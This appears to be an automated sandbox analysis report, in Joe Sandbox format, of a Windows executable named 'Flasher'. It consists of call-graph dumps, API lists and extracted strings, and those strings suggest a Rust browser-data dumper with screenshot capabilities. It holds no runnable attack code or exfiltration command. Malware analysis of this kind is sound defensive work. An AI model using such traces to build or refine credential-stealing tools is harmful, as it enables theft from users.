91326->91366 91328 7ff6d351e5d6 91327->91328 91329 7ff6d351e68c 91327->91329 91331 7ff6d34f8868 2 API calls 91328->91331 91332 7ff6d3531a60 43 API calls 91329->91332 91330 7ff6d35dd5f0 SetFilePointerEx GetLastError 91330->91366 91334 7ff6d351e622 91331->91334 91333 7ff6d351e6f9 91332->91333 91335 7ff6d34f5553 59 API calls 91333->91335 91336 7ff6d351e627 HeapFree 91334->91336 91337 7ff6d351e639 91334->91337 91338 7ff6d351e701 91335->91338 91336->91337 91339 7ff6d351e641 HeapFree 91337->91339 91340 7ff6d351e655 91337->91340 91342 7ff6d351e716 91338->91342 91346 7ff6d34f8868 2 API calls 91338->91346 91339->91340 91343 7ff6d351e65c HeapFree 91340->91343 91344 7ff6d351e670 91340->91344 91341 7ff6d351ed58 91345 7ff6d37341f0 42 API calls 91341->91345 91348 7ff6d35e20e0 43 API calls 91342->91348 91343->91344 91345->91231 91346->91342 91347 7ff6d351d8cb memmove 91349 7ff6d360ec67 50 API calls 91347->91349 91361 7ff6d351e731 91348->91361 91349->91366 91350 7ff6d351ea6d 91353 7ff6d34f7fc7 58 API calls 91350->91353 91351 7ff6d351e834 memmove 91351->91361 91353->91334 91354 7ff6d35e1dd0 42 API calls 91354->91361 91356 7ff6d35ef8a0 46 API calls 91356->91361 91357 7ff6d351e8e3 HeapFree 91357->91361 91358 7ff6d351ea56 HeapFree 91358->91361 91359 7ff6d351dc61 91360 7ff6d360ec67 50 API calls 91360->91366 91361->91312 91361->91350 91361->91351 91361->91354 91361->91356 91361->91357 91361->91358 91362 7ff6d3531a60 43 API calls 91361->91362 91363 7ff6d35f3510 60 API calls 91361->91363 91364 7ff6d34f8868 2 API calls 91361->91364 91365 7ff6d351ea30 HeapFree 91361->91365 91381 7ff6d34f9b1d HeapFree 91361->91381 91362->91361 91363->91361 91364->91361 91365->91361 91366->91239 91366->91250 91366->91252 91366->91253 91366->91254 91366->91255 91366->91257 91366->91258 91366->91259 91366->91260 91366->91262 91366->91268 91366->91270 91366->91276 91366->91278 91366->91280 91366->91293 91366->91294 91366->91306 91366->91318 91366->91326 91366->91330 91366->91341 91366->91347 91366->91359 91366->91360 91367 7ff6d351dd19 memmove 91366->91367 91370 7ff6d34f9b1d HeapFree 91366->91370 91371 7ff6d34f8a64 HeapFree HeapFree HeapFree HeapFree 91366->91371 91372 7ff6d34fb430 43 API calls 91366->91372 91373 7ff6d35d110b 44 API calls 91366->91373 91367->91366 91369->91234 91370->91366 91371->91366 91372->91367 91373->91366 91375 7ff6d3545059 91374->91375 91377 7ff6d3545061 91374->91377 91385 7ff6d3545074 42 API calls 91375->91385 91377->91243 91378->91366 91379->91287 91380->91286 91381->91361 91385->91377 91386 7ff6d3525e4b FreeSid 91387 7ff6d3525e68 91386->91387 91388 7ff6d3531a60 43 API calls 91387->91388 91389 7ff6d3525edd 91388->91389 91389->91389 91390 7ff6d35efed0 3 API calls 91389->91390 91391 7ff6d3525fab 91390->91391 91392 7ff6d352da69 91391->91392 91393 7ff6d3525fb4 91391->91393 91394 7ff6d37341f0 42 API calls 91392->91394 91396 7ff6d360d459 46 API calls 91393->91396 91395 7ff6d352da78 91394->91395 91397 7ff6d3526022 91396->91397 91397->91395 91398 7ff6d34f5a8a 76 API calls 91397->91398 91399 7ff6d352607a 91398->91399 91399->91395 91400 7ff6d34f7d60 4 API calls 91399->91400 91401 7ff6d352632a 91400->91401 91402 7ff6d3531a60 43 API calls 91401->91402 91403 7ff6d3526468 91402->91403 91404 7ff6d352677e 91403->91404 91406 7ff6d3526768 HeapFree 91403->91406 91405 7ff6d352679b 91404->91405 91407 7ff6d352678e CloseHandle 91404->91407 91408 7ff6d35267b8 91405->91408 91409 7ff6d35267ab CloseHandle 91405->91409 91406->91404 91407->91405 91410 7ff6d35267c8 CloseHandle 91408->91410 91427 7ff6d35267d5 91408->91427 91409->91408 91410->91427 91411 7ff6d3526951 91412 7ff6d352695b HeapFree 91411->91412 91413 7ff6d3526971 91411->91413 91412->91413 91414 7ff6d34f7d06 4 API calls 91413->91414 91415 7ff6d352697d 91414->91415 91416 7ff6d3526987 HeapFree 91415->91416 91417 7ff6d352699d 91415->91417 91416->91417 91418 7ff6d35269a7 HeapFree 91417->91418 91419 7ff6d35269bd 91417->91419 91418->91419 91423 7ff6d34f7d06 4 API calls 91419->91423 91420 7ff6d3526846 HeapFree 91420->91427 91421 7ff6d352d2e4 91689 7ff6d3545430 HeapFree 91421->91689 91425 7ff6d35269c9 91423->91425 91428 7ff6d35269e9 91425->91428 91429 7ff6d35269d3 HeapFree 91425->91429 91427->91411 91427->91420 91427->91421 91434 7ff6d35268c4 HeapFree 91427->91434 91436 7ff6d35268e0 91427->91436 91431 7ff6d3526a09 91428->91431 91432 7ff6d35269f3 HeapFree 91428->91432 91429->91428 91435 7ff6d34f7d06 4 API calls 91431->91435 91432->91431 91434->91427 91438 7ff6d3526a15 91435->91438 91439 7ff6d3526910 HeapFree 91436->91439 91440 7ff6d3526a3d memmove 91438->91440 91688 7ff6d352c828 91438->91688 91439->91439 91442 7ff6d352692c HeapFree 91439->91442 91443 7ff6d3577892 HeapFree 91440->91443 91442->91411 91447 7ff6d3526a6e 91443->91447 91444 7ff6d37392c1 43 API calls 91453 7ff6d352c853 91444->91453 91449 7ff6d3526a78 HeapFree 91447->91449 91454 7ff6d3526a8a 91447->91454 91449->91454 91452 7ff6d37341f0 42 API calls 91455 7ff6d352d44a 91452->91455 91453->91452 91454->91454 91457 7ff6d35efed0 3 API calls 91454->91457 91456 7ff6d37341f0 42 API calls 91455->91456 91458 7ff6d352d459 91456->91458 91459 7ff6d3526b16 91457->91459 91690 7ff6d37345d0 42 API calls 91458->91690 91461 7ff6d352d4dd 91459->91461 91463 7ff6d3526b46 91459->91463 91468 7ff6d357c9e5 43 API calls 91459->91468 91464 7ff6d37341f0 42 API calls 91461->91464 91465 7ff6d3532a40 43 API calls 91463->91465 91466 7ff6d352d4ec 91464->91466 91469 7ff6d3526b8d 91465->91469 91470 7ff6d37341f0 42 API calls 91466->91470 91468->91463 91472 7ff6d3502b57 243 API calls 91469->91472 91473 7ff6d352d4fb 91470->91473 91475 7ff6d3526b95 91472->91475 91476 7ff6d37341f0 42 API calls 91473->91476 91478 7ff6d3532a40 43 API calls 91475->91478 91479 7ff6d352d50a 91476->91479 91481 7ff6d3526bb3 memmove 91478->91481 91482 7ff6d37341f0 42 API calls 91479->91482 91484 7ff6d35142d8 683 API calls 91481->91484 91485 7ff6d352d519 91482->91485 91487 7ff6d3526be9 91484->91487 91488 7ff6d37341f0 42 API calls 91485->91488 91490 7ff6d34f995c 18 API calls 91487->91490 91491 7ff6d352d528 91488->91491 91493 7ff6d3526bf8 91490->91493 91494 7ff6d37341f0 42 API calls 91491->91494 91496 7ff6d3532a40 43 API calls 91493->91496 91497 7ff6d352d537 91494->91497 91499 7ff6d3526c0f 91496->91499 91500 7ff6d37341f0 42 API calls 91497->91500 91501 7ff6d3532a40 43 API calls 91499->91501 91502 7ff6d352d546 91500->91502 91503 7ff6d3526c23 91501->91503 91504 7ff6d37341f0 42 API calls 91502->91504 91505 7ff6d355daf7 42 API calls 91503->91505 91506 7ff6d352d555 91504->91506 91507 7ff6d3526c2f 91505->91507 91508 7ff6d37341f0 42 API calls 91506->91508 91511 7ff6d35efed0 3 API calls 91507->91511 91509 7ff6d352d564 91508->91509 91510 7ff6d37341f0 42 API calls 91509->91510 91512 7ff6d352d573 91510->91512 91516 7ff6d3526ca8 91511->91516 91513 7ff6d37341f0 42 API calls 91512->91513 91514 7ff6d352d582 91513->91514 91515 7ff6d37341f0 42 API calls 91514->91515 91517 7ff6d352d591 91515->91517 91516->91466 91520 7ff6d35efed0 3 API calls 91516->91520 91521 7ff6d3526db2 91520->91521 91521->91473 91522 7ff6d34f529f 48 API calls 91521->91522 91523 7ff6d3526e0c 91522->91523 91524 7ff6d3526e2c 91523->91524 91525 7ff6d3526e16 HeapFree 91523->91525 91526 7ff6d35efed0 3 API calls 91524->91526 91525->91524 91688->91444 91698 7ff6d34f5660 91699 7ff6d35f3510 60 API calls 91698->91699 91700 7ff6d34f5682 91699->91700 91701 7ff6d34f56a0 91700->91701 91702 7ff6d34f568e HeapFree 91700->91702 91702->91701 91703 7ff6d35229ca 92197 7ff6d34f2801 91703->92197 91706 7ff6d3522a28 91707 7ff6d3522a3d HeapFree 91706->91707 91708 7ff6d3522b46 91706->91708 91707->91708 91710 7ff6d35efed0 3 API calls 91708->91710 91723 7ff6d3522b88 91708->91723 91709 7ff6d3522af2 91709->91708 91711 7ff6d3522b30 HeapFree 91709->91711 91712 7ff6d3522b5e 91710->91712 91711->91708 91715 7ff6d352db4a 91712->91715 91717 7ff6d35efed0 3 API calls 91712->91717 91713 7ff6d3522a8a 91713->91709 91714 7ff6d352d255 91713->91714 92305 7ff6d35d20a5 43 API calls 91714->92305 91719 7ff6d3522b7f 91717->91719 91718 7ff6d352d272 92306 7ff6d3737bd5 43 API calls 91718->92306 91721 7ff6d352db8a 91719->91721 91719->91723 92317 7ff6d35b2349 HeapFree HeapFree HeapFree 91721->92317 91722 7ff6d352d280 92307 7ff6d34f8b33 49 API calls 91722->92307 91724 7ff6d3522c31 91723->91724 91725 7ff6d34f7b99 9 API calls 91723->91725 91727 7ff6d3522c6d 91725->91727 91730 7ff6d352d791 91727->91730 91733 7ff6d35db150 42 API calls 91727->91733 91728 7ff6d352d28f 91731 7ff6d37341f0 42 API calls 91728->91731 91734 7ff6d352d47a 91731->91734 91740 7ff6d3522cd4 91733->91740 92310 7ff6d3734750 42 API calls 91734->92310 91737 7ff6d352d862 91741 7ff6d3734b10 42 API calls 91737->91741 91740->91737 91743 7ff6d35efed0 3 API calls 91740->91743 91744 7ff6d352d89c 91741->91744 91752 7ff6d3522d53 91743->91752 91747 7ff6d3734b10 42 API calls 91744->91747 91746 7ff6d352d776 91749 7ff6d37341f0 42 API calls 91746->91749 91750 7ff6d352d8a8 91747->91750 91753 7ff6d352d785 91749->91753 91754 7ff6d3734b10 42 API calls 91750->91754 91752->91746 91759 7ff6d35d2f94 memcmp 91752->91759 91753->91730 91756 7ff6d3734b10 42 API calls 91753->91756 91757 7ff6d352d8b4 91754->91757 91756->91730 91760 7ff6d3734b10 42 API calls 91757->91760 91762 7ff6d3522e50 91759->91762 91763 7ff6d352d8c0 91760->91763 91762->91737 91766 7ff6d3522e67 91762->91766 91767 7ff6d3734b10 42 API calls 91763->91767 91769 7ff6d3531a60 43 API calls 91766->91769 91770 7ff6d352d8cc 91767->91770 91776 7ff6d3522ed0 91769->91776 91772 7ff6d3734b10 42 API calls 91770->91772 91772->91730 91778 7ff6d35d2f94 memcmp 91776->91778 91780 7ff6d3522fac 91778->91780 91780->91744 91782 7ff6d3522fbc 91780->91782 91783 7ff6d3531a60 43 API calls 91782->91783 91788 7ff6d3523020 91783->91788 91790 7ff6d35d2f94 memcmp 91788->91790 91792 7ff6d35230cd 91790->91792 91792->91750 91795 7ff6d35230dd 91792->91795 91797 7ff6d3531a60 43 API calls 91795->91797 91802 7ff6d3523141 91797->91802 91804 7ff6d35d2f94 memcmp 91802->91804 91806 7ff6d35231fe 91804->91806 91806->91757 91808 7ff6d352320e 91806->91808 91809 7ff6d3531a60 43 API calls 91808->91809 91810 7ff6d3523272 91809->91810 91811 7ff6d35d2f94 memcmp 91810->91811 91812 7ff6d3523327 91811->91812 91813 7ff6d35d2f94 memcmp 91812->91813 91814 7ff6d3523342 91813->91814 91814->91763 91815 7ff6d3523352 91814->91815 91816 7ff6d35d2f94 memcmp 91815->91816 91817 7ff6d3523371 91816->91817 91818 7ff6d35d2f94 memcmp 91817->91818 91819 7ff6d352338c 91818->91819 91819->91753 91820 7ff6d3531a60 43 API calls 91819->91820 91821 7ff6d3523440 91820->91821 91822 7ff6d35d2f94 memcmp 91821->91822 91823 7ff6d35234fe 91822->91823 91824 7ff6d35d2f94 memcmp 91823->91824 91825 7ff6d3523519 91824->91825 91825->91770 91826 7ff6d3523529 91825->91826 91827 7ff6d3531a60 43 API calls 91826->91827 91828 7ff6d352358d 91827->91828 91829 7ff6d35efed0 3 API calls 91828->91829 91830 7ff6d3523624 91829->91830 91830->91746 91831 7ff6d352362d 91830->91831 91832 7ff6d360d459 46 API calls 91831->91832 91833 7ff6d35236c3 91832->91833 91833->91730 91834 7ff6d34f5a8a 76 API calls 91833->91834 91835 7ff6d35237cc 91834->91835 91835->91730 91836 7ff6d35efed0 3 API calls 91835->91836 92198 7ff6d34f282b 92197->92198 92199 7ff6d34f2856 92197->92199 92198->92199 92202 7ff6d34f2893 92198->92202 92203 7ff6d34f2908 92198->92203 92319 7ff6d35d20a5 43 API calls 92199->92319 92201 7ff6d34f2874 92320 7ff6d3737bd5 43 API calls 92201->92320 92207 7ff6d34f2acc 92202->92207 92208 7ff6d34f289c 92202->92208 92204 7ff6d34f2b54 92203->92204 92205 7ff6d34f2911 92203->92205 92324 7ff6d35d3084 44 API calls 92204->92324 92212 7ff6d34f2c4f 92205->92212 92213 7ff6d34f291a 92205->92213 92214 7ff6d34f2bf4 92207->92214 92215 7ff6d34f2ad5 92207->92215 92209 7ff6d34f28a5 92208->92209 92210 7ff6d34f2bc6 92208->92210 92216 7ff6d34f2b90 92209->92216 92217 7ff6d34f28ae 92209->92217 92326 7ff6d34f1ffa 43 API calls 92210->92326 92328 7ff6d34f2694 43 API calls 92212->92328 92213->92216 92221 7ff6d34f2923 92213->92221 92327 7ff6d34f1ffa 43 API calls 92214->92327 92215->92216 92222 7ff6d34f2ade 92215->92222 92225 7ff6d34f30b2 92216->92225 92226 7ff6d34f2b9a 92216->92226 92321 7ff6d34f1ffa 43 API calls 92217->92321 92219 7ff6d34f2b76 92230 7ff6d34f2cca 92219->92230 92231 7ff6d34f2de6 92219->92231 92232 7ff6d34f2882 92219->92232 92221->92199 92236 7ff6d34f292c 92221->92236 92222->92199 92235 7ff6d34f2ae7 92222->92235 92337 7ff6d35d20a5 43 API calls 92225->92337 92325 7ff6d34f2694 43 API calls 92226->92325 92229 7ff6d34f2b20 92322 7ff6d35d20a5 43 API calls 92229->92322 92239 7ff6d34f2ed3 92230->92239 92247 7ff6d35efed0 3 API calls 92230->92247 92257 7ff6d34f2cf8 92230->92257 92332 7ff6d34fb46f 43 API calls 92231->92332 92232->91706 92232->91713 92234 7ff6d34f30cd 92338 7ff6d3737bd5 43 API calls 92234->92338 92235->92229 92248 7ff6d34f2d44 92235->92248 92259 7ff6d34f2b4c 92235->92259 92256 7ff6d34f2989 92236->92256 92267 7ff6d34f2801 70 API calls 92236->92267 92269 7ff6d34f2c9c 92236->92269 92276 7ff6d34f2e34 92236->92276 92281 7ff6d36116dc 43 API calls 92236->92281 92243 7ff6d34f2edb memmove 92239->92243 92242 7ff6d34f2bb0 92242->92232 92329 7ff6d35d26ab 48 API calls 92242->92329 92243->92232 92244 7ff6d37341f0 42 API calls 92250 7ff6d34f3567 92244->92250 92245 7ff6d34f2e26 92334 7ff6d3737bd5 43 API calls 92245->92334 92246 7ff6d34f2b3e 92323 7ff6d3737bd5 43 API calls 92246->92323 92253 7ff6d34f2ce9 92247->92253 92330 7ff6d35d3084 44 API calls 92248->92330 92249 7ff6d34f2d26 92249->92232 92352 7ff6d37337e0 44 API calls 92249->92352 92253->92243 92253->92257 92333 7ff6d35d20a5 43 API calls 92256->92333 92257->92244 92258 7ff6d34f2d66 92258->92259 92331 7ff6d3578b65 43 API calls 92258->92331 92279 7ff6d34f2fe9 92259->92279 92339 7ff6d35d20a5 43 API calls 92259->92339 92261 7ff6d34f2e55 92268 7ff6d34f2e5d HeapFree 92261->92268 92261->92269 92263 7ff6d34f311e 92340 7ff6d3737bd5 43 API calls 92263->92340 92264 7ff6d34f3175 92264->92249 92351 7ff6d34f8b33 49 API calls 92264->92351 92265 7ff6d34f315d 92265->92249 92350 7ff6d34f8ae0 HeapFree HeapFree HeapFree HeapFree 92265->92350 92267->92236 92268->92269 92269->92249 92348 7ff6d35d20a5 43 API calls 92269->92348 92270 7ff6d34f2d85 92270->92259 92336 7ff6d34ffd50 43 API calls 92270->92336 92273 7ff6d34f33e4 92349 7ff6d3737bd5 43 API calls 92273->92349 92276->92261 92335 7ff6d35d0e27 48 API calls 92276->92335 92279->92264 92279->92265 92280 7ff6d34f2f97 92282 7ff6d34f31a1 92280->92282 92283 7ff6d34f2fa1 92280->92283 92281->92236 92341 7ff6d35d11b6 54 API calls 92282->92341 92284 7ff6d34f2fb2 HeapFree 92283->92284 92285 7ff6d34f34f0 92283->92285 92284->92285 92356 7ff6d35d2651 48 API calls 92285->92356 92287 7ff6d34f31c3 92301 7ff6d34f31d3 92287->92301 92342 7ff6d34f8b33 49 API calls 92287->92342 92290 7ff6d34f3215 92353 7ff6d35d20a5 43 API calls 92290->92353 92292 7ff6d34f349a 92355 7ff6d3737bd5 43 API calls 92292->92355 92293 7ff6d34f338d 92293->92269 92296 7ff6d34f3255 92293->92296 92354 7ff6d35d20a5 43 API calls 92296->92354 92300 7ff6d34f3542 92300->92257 92300->92285 92301->92285 92301->92290 92301->92293 92301->92296 92301->92300 92343 7ff6d35d3084 44 API calls 92301->92343 92344 7ff6d3578b65 43 API calls 92301->92344 92345 7ff6d34ffd50 43 API calls 92301->92345 92346 7ff6d35d11b6 54 API calls 92301->92346 92347 7ff6d34f8b33 49 API calls 92301->92347 92305->91718 92306->91722 92307->91728 92319->92201 92320->92232 92321->92232 92322->92246 92323->92259 92324->92219 92325->92242 92326->92232 92327->92232 92328->92242 92329->92249 92330->92258 92331->92270 92332->92249 92333->92245 92334->92276 92335->92276 92336->92280 92337->92234 92338->92249 92339->92263 92340->92279 92341->92287 92342->92301 92343->92301 92344->92301 92345->92301 92346->92301 92347->92301 92348->92273 92349->92279 92351->92249 92352->92232 92353->92292 92354->92292 92355->92285 92356->92259 92357 7ff6d352e490 AddVectoredExceptionHandler SetThreadStackGuarantee GetCurrentThread SetThreadDescription 92358 7ff6d352e502 92357->92358 92359 7ff6d352e529 92357->92359 92358->92359 92361 7ff6d352e6ad 92358->92361 92360 7ff6d35efed0 3 API calls 92359->92360 92362 7ff6d352e556 92360->92362 92381 7ff6d3737e70 42 API calls 92361->92381 92364 7ff6d352e55f 92362->92364 92365 7ff6d352e6b2 92362->92365 92366 7ff6d352e611 92364->92366 92379 7ff6d35d4fc0 42 API calls 92364->92379 92368 7ff6d352e6f5 92365->92368 92382 7ff6d35d5150 HeapFree HeapFree 92365->92382 92376 7ff6d34f5a7e 92366->92376 92369 7ff6d352e604 92380 7ff6d35d51b0 HeapFree HeapFree 92369->92380 92374 7ff6d352e6a1 92375 7ff6d3737ec0 4 API calls 92375->92374 92378 7ff6d351edb9 201 API calls 92376->92378 92377 7ff6d34f5a84 92377->92374 92377->92375 92378->92377 92379->92369 92380->92366 92382->92368 92383 7ff6d3510aaf HeapFree 92384 7ff6d34f5553 59 API calls 92383->92384 92385 7ff6d3510ad3 92384->92385 92386 7ff6d3510ae5 92385->92386 92387 7ff6d34f8868 2 API calls 92385->92387 92432 7ff6d3500462 92386->92432 92387->92386 92389 7ff6d3510d77 92391 7ff6d34f7fc7 58 API calls 92389->92391 92412 7ff6d351083e 92389->92412 92390 7ff6d3510f66 92394 7ff6d3734a10 42 API calls 92390->92394 92391->92412 92392 7ff6d3510d98 92392->92392 92393 7ff6d3532a40 43 API calls 92395 7ff6d3510aff 92393->92395 92396 7ff6d3510fa5 92394->92396 92395->92389 92395->92390 92395->92393 92395->92396 92397 7ff6d35e1dd0 42 API calls 92395->92397 92399 7ff6d3510fb1 92395->92399 92407 7ff6d3531a60 43 API calls 92395->92407 92410 7ff6d3510d07 HeapFree 92395->92410 92418 7ff6d34f8868 2 API calls 92395->92418 92419 7ff6d3510d5b HeapFree 92395->92419 92437 7ff6d34f5616 61 API calls 92395->92437 92398 7ff6d3734b10 42 API calls 92396->92398 92397->92395 92398->92399 92401 7ff6d3734b10 42 API calls 92399->92401 92400 7ff6d3531a60 43 API calls 92400->92412 92402 7ff6d3510fbd 92401->92402 92404 7ff6d37341f0 42 API calls 92402->92404 92403 7ff6d35df580 72 API calls 92403->92412 92405 7ff6d3510fcc 92404->92405 92406 7ff6d37341f0 42 API calls 92405->92406 92408 7ff6d3510fdb 92406->92408 92407->92395 92411 7ff6d37341f0 42 API calls 92408->92411 92409 7ff6d34f8868 2 API calls 92409->92412 92410->92395 92415 7ff6d3510fea 92411->92415 92412->92392 92412->92400 92412->92403 92412->92409 92413 7ff6d35109ca HeapFree 92412->92413 92413->92412 92416 7ff6d37341f0 42 API calls 92415->92416 92417 7ff6d3510ff9 92416->92417 92420 7ff6d37341f0 42 API calls 92417->92420 92418->92395 92419->92395 92421 7ff6d3511008 92420->92421 92422 7ff6d37341f0 42 API calls 92421->92422 92423 7ff6d3511017 92422->92423 92424 7ff6d37341f0 42 API calls 92423->92424 92425 7ff6d3511026 92424->92425 92426 7ff6d37341f0 42 API calls 92425->92426 92427 7ff6d3511035 92426->92427 92428 7ff6d37341f0 42 API calls 92427->92428 92429 7ff6d3511044 92428->92429 92438 7ff6d3733919 47 API calls 92429->92438 92431 7ff6d3511055 92433 7ff6d35e20e0 43 API calls 92432->92433 92434 7ff6d350047f 92433->92434 92435 7ff6d35004c2 92434->92435 92436 7ff6d35004a8 HeapFree 92434->92436 92435->92395 92436->92435 92437->92395 92438->92431
                                                                      APIs
                                                                      • HeapFree.KERNEL32(?,00000000,?,?,?,00007FF6D35EACC2,?,?,?,00000000,?,?,?,00007FF6D35E3B0B), ref: 00007FF6D35E274C
                                                                      • HeapFree.KERNEL32(?,00000000,?,?,?,00007FF6D35EACC2,?,?,?,00000000,?,?,?,00007FF6D35E3B0B), ref: 00007FF6D35E2844
                                                                      • HeapFree.KERNEL32(?,00000000,?,?,?,00007FF6D35EACC2,?,?,?,00000000,?,?,?,00007FF6D35E3B0B), ref: 00007FF6D35E29A2
                                                                      • HeapFree.KERNEL32(?,00000000,?,?,?,00007FF6D35EACC2,?,?,?,00000000,?,?,?,00007FF6D35E3B0B), ref: 00007FF6D35E29CF
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00007FF6D35E2A97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$EnvironmentStrings
                                                                      • String ID: #$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "batch file arguments are invalid$.exeprogram not found$PATHstd\src\sys_common\process.rs$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0
                                                                      • API String ID: 2767186067-3265660329
                                                                      • Opcode ID: c4b4304efdc3ef1e8ce3ea43a7fbe4a544ed6573ab869ae442f3b89131ec6507
                                                                      • Instruction ID: 2184cd15ba97cbcd2f1e8eb8152c1558625cfda68e848e8b784e47b241ddcb63
                                                                      • Opcode Fuzzy Hash: c4b4304efdc3ef1e8ce3ea43a7fbe4a544ed6573ab869ae442f3b89131ec6507
                                                                      • Instruction Fuzzy Hash: 92838062A09FD588E7748F21D8463FEA7A0FB44789F445136CA5DEBB98DF389261C304
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$Delete$memmove$Object$Create$CompatibleStretch$BitmapBitsDisplayEnumInfoModeMonitorMonitorsSelect
                                                                      • String ID: $ $IEND$IHDR$PLTE$acTL$cHRM$fdAT$gAMA$gAMA$iTXt$sRGB$tEXt$tRNS$zTXt
                                                                      • API String ID: 127125892-1981636098
                                                                      • Opcode ID: c966a4e52b91691c3d3d76ac73b2bc39e10f55f4d800f19b33edad17018e0b42
                                                                      • Instruction ID: 413e092c5ff44b5316073057b40b67033c92f580fd5552f769a45cc3fca69398
                                                                      • Opcode Fuzzy Hash: c966a4e52b91691c3d3d76ac73b2bc39e10f55f4d800f19b33edad17018e0b42
                                                                      • Instruction Fuzzy Hash: C4239E72A0DBC585E6709B11E4453EEB3A1FB89B84F444136CA8DA7B99DF3CD1A5CB00
                                                                      APIs
                                                                      Strings
                                                                      • lid UTF-8 sequence in column nameC:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rusqlite-0.28.0\src\column.rs, xrefs: 00007FF6D350F472
                                                                      • ractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName, xrefs: 00007FF6D350AA34
                                                                      • ingInvalidCharsetInvalidDateTimeDerConstraintFailedLifetimeErrorIncompleteNomErrordepthSqliteFailureSqliteSingleThreadedModeFromSqlConversionFailureIntegralValueOutOfRangeInvalidParameterNameInvalidPathExecuteReturnedResultsQueryReturnedNoRowsInvalidColumnInde, xrefs: 00007FF6D350E30B
                                                                      • LOCALAPPDATAsrc\chromium\dumper.rs, xrefs: 00007FF6D3510633
                                                                      • ghijklmnopqrstuvwxyz0123456789, xrefs: 00007FF6D350EDF8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$memmove
                                                                      • String ID: LOCALAPPDATAsrc\chromium\dumper.rs$ghijklmnopqrstuvwxyz0123456789$ingInvalidCharsetInvalidDateTimeDerConstraintFailedLifetimeErrorIncompleteNomErrordepthSqliteFailureSqliteSingleThreadedModeFromSqlConversionFailureIntegralValueOutOfRangeInvalidParameterNameInvalidPathExecuteReturnedResultsQueryReturnedNoRowsInvalidColumnInde$lid UTF-8 sequence in column nameC:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rusqlite-0.28.0\src\column.rs$ractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName
                                                                      • API String ID: 2650465384-2981620428
                                                                      • Opcode ID: 74bbf044e0daa670557e0f3f6b77c29a5bfd14fabd50091a070a4c5c1e25d04a
                                                                      • Instruction ID: 03ce82f5708f4655f4618a2d6d99ed26975c45cb2102f9d0744527819c98065f
                                                                      • Opcode Fuzzy Hash: 74bbf044e0daa670557e0f3f6b77c29a5bfd14fabd50091a070a4c5c1e25d04a
                                                                      • Instruction Fuzzy Hash: E2D38036A09FC581EB618F14E4522EDB364FB88B50F449222DB9D637A9DF3DD5A2C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$CloseHandlememmove
